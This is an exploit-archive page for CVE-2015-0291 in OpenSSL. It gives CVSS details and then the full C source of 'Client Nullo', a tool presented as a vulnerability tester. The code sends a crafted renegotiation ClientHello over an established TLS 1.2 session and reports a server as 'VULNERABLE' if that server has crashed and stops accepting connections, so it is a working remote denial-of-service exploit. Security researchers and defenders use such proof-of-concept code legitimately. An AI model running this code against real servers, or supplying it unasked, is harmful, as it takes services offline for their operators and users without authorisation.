OpenSSL DoS tester now available (CVE-2015-0291)

2015.03.22
Credit: mancha140
Risk: Medium
Local: No
Remote: Yes
CWE: CWE-Other


CVSS Base Score: 5/10
Impact Subscore: 2.9/10
Exploitability Subscore: 10/10
Exploit range: Remote
Attack complexity: Low
Authentication: Not required
Confidentiality impact: None
Integrity impact: None
Availability impact: Partial

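/*
 * Client Nullo
 * vulnerability tester for CVE-2015-0291
 * by: mancha (twitter: @mancha140)
 *
 * $ gcc -o clientnullo clientnullo.c -lcrypto -lssl
 * $ ./clientnullo [host] [port]
 *
 * How the check works: the program completes a TLS 1.2 handshake, writes a
 * second, pre-built ClientHello over the established session, closes the
 * connection, waits two seconds and then tries to open a new TCP connection
 * to the same address.  The verdict is derived only from whether that second
 * connect() succeeds, so the check is disruptive by design: "VULNERABLE" is
 * reported because the service stopped accepting connections.
 *
 * Limits of the verdict:
 *   - "VULNERABLE" is printed for any connect() failure; the errno text is
 *     written to stderr so a refused connection can be told apart from an
 *     unrelated network error.
 *   - "not vulnerable" only means the port accepted a connection two seconds
 *     later.  NOTE(review): a server that is restarted by a supervisor, or
 *     that handles each connection in a separate worker process, would
 *     presumably still accept it; confirm the installed OpenSSL version
 *     against the vendor advisory rather than relying on this output.
 *
 * Build note: ssl->s3->previous_client_finished and ssl3_write_bytes() are
 * library internals.  NOTE(review): this presumably builds only against
 * OpenSSL releases whose installed headers expose them -- confirm.
 */

#include <errno.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <netinet/in.h>
#include <netdb.h>
#include <openssl/rand.h>
#include <openssl/ssl.h>
#include <openssl/err.h>

/* Report a failed libc/syscall via perror() and terminate. */
#define do_error(m) do { perror(m); exit(1); } while (0)
/* Dump the OpenSSL error queue to stderr and terminate. */
#define do_ssl_error() do { ERR_print_errors_fp(stderr); exit(1); } while (0)

enum {
    NULLO_LEN     = 80,  /* total size of the pre-built handshake message */
    VERIFY_OFFSET = 68,  /* where the Finished verify data is copied in   */
    VERIFY_LEN    = 12   /* number of verify-data bytes copied            */
};

/*
 * Pre-built ClientHello handshake message (first byte 0x01, version 0x0303).
 * It offers the single cipher suite 0x002f, which matches the "AES128-SHA"
 * cipher list configured below.  The extension with type 0x000d carries six
 * bytes that spell the author's handle rather than defined algorithm pairs.
 * Bytes VERIFY_OFFSET..NULLO_LEN-1 are left zero here and filled at runtime.
 *
 * unsigned char: several initialisers exceed 0x7f and would not fit a
 * signed char without an implementation-defined conversion.
 */
static unsigned char nullo[NULLO_LEN] = {
    0x01, 0x00, 0x00, 0x4c, 0x03, 0x03, 0x0c, 0x04,
    0xe2, 0xd0, 0xe7, 0x72, 0xe2, 0x5b, 0x7f, 0x6d,
    0x08, 0xc1, 0xa3, 0xd0, 0xcf, 0x61, 0x98, 0xff,
    0xa3, 0xf4, 0x40, 0x81, 0x15, 0x5f, 0x6e, 0x58,
    0x22, 0x0b, 0x5b, 0xfa, 0x03, 0x14, 0x00, 0x00,
    0x02, 0x00, 0x2f, 0x01, 0x00, 0x00, 0x21, 0x00,
    0x23, 0x00, 0x00, 0x00, 0x0d, 0x00, 0x08, 0x00,
    0x06, 0x6d, 0x61, 0x6e, 0x63, 0x68, 0x61, 0xff,
    0x01, 0x00, 0x0d, 0x0c
};

/*
 * Entry point.
 *
 * argv[1] is the host and argv[2] the service name or port.  Exits with
 * status 1 on a usage, resolution, socket or TLS error; otherwise prints
 * "VULNERABLE" or "not vulnerable" on stdout and returns 0.
 */
int main(int argc, char **argv)
{
    int sockfd;
    struct addrinfo hints, *results;
    SSL_CTX *ctx;
    SSL *ssl;

    if (argc != 3) {
        printf("Usage: %s [host] [service/port]\n", argv[0]);
        exit(1);
    }

    memset(&hints, 0, sizeof(hints));
    hints.ai_family = AF_UNSPEC;
    hints.ai_socktype = SOCK_STREAM;

    if (getaddrinfo(argv[1], argv[2], &hints, &results)) {
        fprintf(stderr, "getaddrinfo error\n");
        exit(1);
    }

    /* Only the first address returned by the resolver is tried. */
    if ((sockfd = socket(results->ai_family, results->ai_socktype,
                         results->ai_protocol)) == -1)
        do_error("socket");

    if (connect(sockfd, results->ai_addr, results->ai_addrlen) == -1)
        do_error("connect");

    SSL_load_error_strings();
    SSL_library_init();

    /*
     * No verify mode or trust store is configured on the context, so the
     * peer certificate is not validated by this program.
     */
    if (!(ctx = SSL_CTX_new(TLSv1_2_client_method())))
        do_ssl_error();

    if (!SSL_CTX_set_cipher_list(ctx, "AES128-SHA"))
        do_ssl_error();

    if (!(ssl = SSL_new(ctx)))
        do_ssl_error();

    if (!SSL_set_fd(ssl, sockfd))
        do_ssl_error();

    if (SSL_connect(ssl) != 1)
        do_ssl_error();

    /* Bind the second ClientHello to the handshake that just completed. */
    memcpy(&nullo[VERIFY_OFFSET], ssl->s3->previous_client_finished,
           VERIFY_LEN);

    if (ssl3_write_bytes(ssl, SSL3_RT_HANDSHAKE, nullo, NULLO_LEN) <= 0)
        do_ssl_error();

    SSL_shutdown(ssl);
    SSL_free(ssl);
    close(sockfd);
    SSL_CTX_free(ctx);

    /* Give the server time to process the message before probing again. */
    sleep(2);

    /*
     * A local socket() failure says nothing about the server, so it is
     * reported as an error instead of falling through to connect() with an
     * invalid descriptor and being counted as "VULNERABLE".
     */
    sockfd = socket(results->ai_family, results->ai_socktype,
                    results->ai_protocol);
    if (sockfd == -1)
        do_error("socket");

    if (connect(sockfd, results->ai_addr, results->ai_addrlen) == -1) {
        int saved_errno = errno;  /* printf() below may overwrite errno */

        printf("VULNERABLE\n");
        fprintf(stderr, "reconnect failed: %s\n", strerror(saved_errno));
    } else {
        printf("not vulnerable\n");
    }

    close(sockfd);
    freeaddrinfo(results);

    return 0;
}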

